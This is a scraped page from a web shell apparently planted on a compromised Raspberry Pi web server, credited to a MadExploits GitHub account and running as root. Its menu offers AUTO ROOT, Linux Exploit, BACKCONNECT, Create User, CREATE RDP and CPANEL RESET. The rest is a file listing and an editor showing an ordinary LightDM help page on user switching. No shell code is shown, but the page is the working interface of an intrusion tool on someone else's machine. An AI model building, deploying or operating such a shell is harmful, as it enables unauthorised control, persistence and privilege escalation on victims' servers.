Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.15
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
help /
C /
lightdm /
[ HOME SHELL ]
Name
Size
Permission
Action
autologin.page
1.25
KB
-rw-r--r--
config.page
964
B
-rw-r--r--
default-greeter.page
205
B
-rw-r--r--
default-session.page
216
B
-rw-r--r--
diagnostics.page
277
B
-rw-r--r--
guest.page
564
B
-rw-r--r--
index.page
1.87
KB
-rw-r--r--
legal.xml
494
B
-rw-r--r--
local-sessions.page
612
B
-rw-r--r--
remote-sessions.page
1.02
KB
-rw-r--r--
seat.page
318
B
-rw-r--r--
standard-authentication.page
752
B
-rw-r--r--
user-list.page
487
B
-rw-r--r--
user-switching.page
1.16
KB
-rw-r--r--
vnc.page
185
B
-rw-r--r--
write-greeter.page
204
B
-rw-r--r--
xdmcp.page
189
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : user-switching.page
<page xmlns="http://projectmallard.org/1.0/" type="guide" id="multi-session"> <info> <link type="guide" xref="index#display-management"/> </info> <title>User Switching</title> <p> <em>User switching</em> is a method of running more than one session at a time on a <link xref="seat">seat</link> and switching between them. Only one session can be used at a time. The session is switched by contacting the display manager using D-Bus and calling the one of the following method on the Seat object: </p> <list> <item> <p> SwitchToGreeter - A greeter session is started. This allows the user to authenticate for a new session or authenticate to return to their current session. </p> </item> <item> <p> SwitchToUser - If there is a session for the given user then it is switched to, otherwise a greeter is started. </p> </item> <item> <p> SwitchToGuest - If a guest session is active it is switched to, otherwise a guest session is started. </p> </item> </list> <p> Switching is performed using <em>virtual terminals</em> in the kernel. Each session has a separate display server and the selected session is activated by changing the active virtual terminal. </p> </page>
Close